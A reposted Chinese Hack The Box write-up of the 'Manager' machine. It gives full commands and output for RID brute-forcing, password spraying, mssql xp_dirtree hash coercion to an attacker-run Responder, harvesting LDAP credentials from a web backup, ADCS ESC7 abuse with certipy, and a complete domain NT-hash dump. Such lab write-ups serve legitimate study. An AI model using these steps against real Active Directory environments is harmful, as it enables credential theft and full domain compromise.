HTB-Manager(Medium)

admin
admin
admin
102360
文章
87
评论
2023年10月25日22:12:00评论339 views字数 10599阅读35分19秒阅读模式

知识点:rid枚举用户密码喷射;mssql执行xp_dirtree探测敏感文件;ADCS-ESC7提权。

Scan

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# nmap -sC -sV -Pn 10.10.11.236Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-24 10:14 EDTNmap scan report for 10.10.11.236Host is up (0.38s latency).Not shown: 987 filtered tcp ports (no-response)PORT     STATE SERVICE       VERSION53/tcp   open  domain        Simple DNS Plus80/tcp   open  http          Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Manager| http-methods: |_  Potentially risky methods: TRACE88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-24 19:39:02Z)135/tcp  open  msrpc         Microsoft Windows RPC139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=dc01.manager.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb| Not valid before: 2023-07-30T13:51:28|_Not valid after:  2024-07-29T13:51:28|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m00s from scanner time.445/tcp  open  microsoft-ds?464/tcp  open  kpasswd5?593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=dc01.manager.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb| Not valid before: 2023-07-30T13:51:28|_Not valid after:  2024-07-29T13:51:28|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback| Not valid before: 2023-10-24T17:16:19|_Not valid after:  2053-10-24T17:16:19| ms-sql-info: |   10.10.11.236:1433: |     Version: |       name: Microsoft SQL Server 2019 RTM|       number: 15.00.2000.00|       Product: Microsoft SQL Server 2019|       Service pack level: RTM|       Post-SP patches applied: false|_    TCP port: 1433|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m01s from scanner time.| ms-sql-ntlm-info: |   10.10.11.236:1433: |     Target_Name: MANAGER|     NetBIOS_Domain_Name: MANAGER|     NetBIOS_Computer_Name: DC01|     DNS_Domain_Name: manager.htb|     DNS_Computer_Name: dc01.manager.htb|     DNS_Tree_Name: manager.htb|_    Product_Version: 10.0.177633268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=dc01.manager.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb| Not valid before: 2023-07-30T13:51:28|_Not valid after:  2024-07-29T13:51:28|_ssl-date: 2023-10-24T19:40:39+00:00; +5h23m59s from scanner time.3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.| ssl-cert: Subject: commonName=dc01.manager.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb| Not valid before: 2023-07-30T13:51:28|_Not valid after:  2024-07-29T13:51:28Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:| smb2-time: |   date: 2023-10-24T19:39:57|_  start_date: N/A|_clock-skew: mean: 5h23m59s, deviation: 1s, median: 5h23m59s| smb2-security-mode: |   311: |_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds


Enum

随便枚举一下

crackmapexec smb 10.10.11.236  -u guest -p '' --shares --rid-brute 10000

HTB-Manager(Medium)把user提取出来写入users.txt

Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

没有什么可利用的roasting,简单的把用户名作为密码(注意这里txt内需要修成小写)得operator

crackmapexec smb 10.10.11.236 -u users.txt -p users.txt --no-brute
#它不会尝试暴力破解,而只使用提供的用户名和密码进行尝试。

HTB-Manager(Medium)

mssql

nmap扫描时看到mssql服务也开启了,也测一下,得operator

crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-brute

HTB-Manager(Medium)用impacket包下的工具进入mssql

impacket-mssqlclient manager.htb/operator:operator@10.10.11.236 -windows-auth



xp_dirtree

尝试了xp_cmdshell等,发现可以执行xp_dirtree,UNC获取的是DC$,正常来说这里保存到文件用john爆破,这里DC$的hash破解不出来:

python3 /usr/share/responder/Responder.py -I tun0 -i 10.10.14.92 -v
SQL> xp_dirtree "\10.10.14.92geqian"

HTB-Manager(Medium)没办法,继续用xp_dirtree翻目录,找到website-backup-27-07-23-old.zip

xp_dirtree 'C:inetpubwwwroot' ,0 ,1# 0:这是深度参数,指定遍历目录的深度。0 表示只遍历指定目录本身,不包括其子目录。如果你想遍历子目录,可以使用 1。# 1:这是文件类型参数,用于筛选要返回的文件类型。1 表示只返回文件,而不包括子目录。如果你想返回子目录,可以使用 0。
# 看到website-backup-27-07-23-old.zip

这里刚好是web的根,直接访问http://10.10.11.236/website-backup-27-07-23-old.zip下载得xml文件里有密码

<?xml version="1.0" encoding="UTF-8"?><ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">   <server>      <host>dc01.manager.htb</host>      <open-port enabled="true">389</open-port>      <secure-port enabled="false">0</secure-port>      <search-base>dc=manager,dc=htb</search-base>      <server-type>microsoft</server-type>      <access-user>         <user>[email protected]</user>         <password>R4v3nBe5tD3veloP3r!123</password>      </access-user>      <uid-attribute>cn</uid-attribute>   </server>   <search type="full">      <dir-list>         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>      </dir-list>   </search></ldap-conf>
得###[email protected]R4v3nBe5tD3veloP3r!123


user

Raven用户登录:

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

HTB-Manager(Medium)发现raven在“Certificate Service DCOM Access”组中,就检查ADCS,发现ESC7:

HTB-Manager(Medium)

whoami /all
certipy-ad find -vulnerable -stdout -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
manager-DC01-CA

HTB-Manager(Medium)

ADCS ESC7

跟着大佬文章慢慢做:https://github.com/ly4k/Certipy#esc7

# 如果您只有访问Manage CA权限,您可以Manage Certificates通过将您的用户添加为新官员来授予自己访问权限。certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

# SubCA可以使用参数在 CA 上启用该模板-enable-template。默认情况下,SubCA模板已启用。certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -debug
# 如果我们已经满足了这次攻击的先决条件,我们可以首先根据模板请求证书SubCA。该请求将被拒绝,但我们将保存私钥并记下请求 ID。┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htbCertipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.[*] Request ID is 13Would you like to save the private key? (y/N) y[*] Saved private key to 13.key[-] Failed to request certificate
# 通过我们的Manage CA和,我们可以使用命令和参数Manage Certificates发出失败的证书请求。ca-issue-request <request ID>certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'# 这一步如果报错Got access denied trying to issue certificate,再做一次第一步的add officer
# 最后,我们可以使用req命令和-retrieve <request ID>参数检索颁发的证书。certipy-ad req -username raven@manager.htb  -password  'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13
# ntpdate 的全称是 "Network Time Protocol Date and Time",用于域内时间同步。 # auth参数一般用于身份认证。sudo ntpdate -s 10.10.11.236certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236

HTB-Manager(Medium)

完整流程:

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -debugCertipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.141.2'[+] Resolved 'MANAGER.HTB' from cache: 10.10.11.236[+] Trying to get DCOM connection for: 10.10.11.236[+] Authenticating to LDAP server[+] Bound to ldaps://10.10.11.236:636 - ssl[+] Default path: DC=manager,DC=htb[+] Configuration path: CN=Configuration,DC=manager,DC=htb[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad req -username [email protected] -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn [email protected]Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.[*] Request ID is 13Would you like to save the private key? (y/N) y[*] Saved private key to 13.key[-] Failed to request certificate                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'Certipy v4.7.0 - by Oliver Lyak (ly4k)
[-] Got access denied trying to issue certificate                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username [email protected] -password 'R4v3nBe5tD3veloP3r!123'Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad req -username [email protected]  -password  'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13[*] Successfully retrieved certificate[*] Got certificate with UPN '[email protected]'[*] Certificate has no object SID[*] Loaded private key from '13.key'[*] Saved certificate and private key to 'administrator.pfx'                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# sudo ntpdate -s 10.10.11.236                                                                                                                                                                   ┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]└─# certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected][*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for 'administrator'[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef



最后导出所有hash

┌──(kali㉿kali)-[~/Desktop/htb/manager]└─$ impacket-secretsdump [email protected] -hashes :ae5064c2f62317332c88629e025924ef -just-dc-ntlm          Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretsAdministrator:500:aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b5edce70e6c1efa075f14bcf5231f79a:::Zhong:1113:aad3b435b51404eeaad3b435b51404ee:7d148e27d43945dca3f9a9ae6cb93e47:::Cheng:1114:aad3b435b51404eeaad3b435b51404ee:5f9fb454ca66927468e91362c391d4fb:::Ryan:1115:aad3b435b51404eeaad3b435b51404ee:7f4e434796eeb1aa0c69630613dbc8a4:::Raven:1116:aad3b435b51404eeaad3b435b51404ee:1635e153d4d6541a6367ec7a369d1fc7:::JinWoo:1117:aad3b435b51404eeaad3b435b51404ee:43b026fc35e89627f2aed3420a1ff09b:::ChinHae:1118:aad3b435b51404eeaad3b435b51404ee:bcc5893596907bc0672ee1a42f6b887b:::Operator:1119:aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:452a4c05d648cefa2a173dbbcd2db654:::[*] Cleaning up...


原文始发于微信公众号(搁浅安全):HTB-Manager(Medium)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月25日22:12:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Manager(Medium)https://cn-sec.com/archives/2145146.html

发表评论

匿名网友 填写信息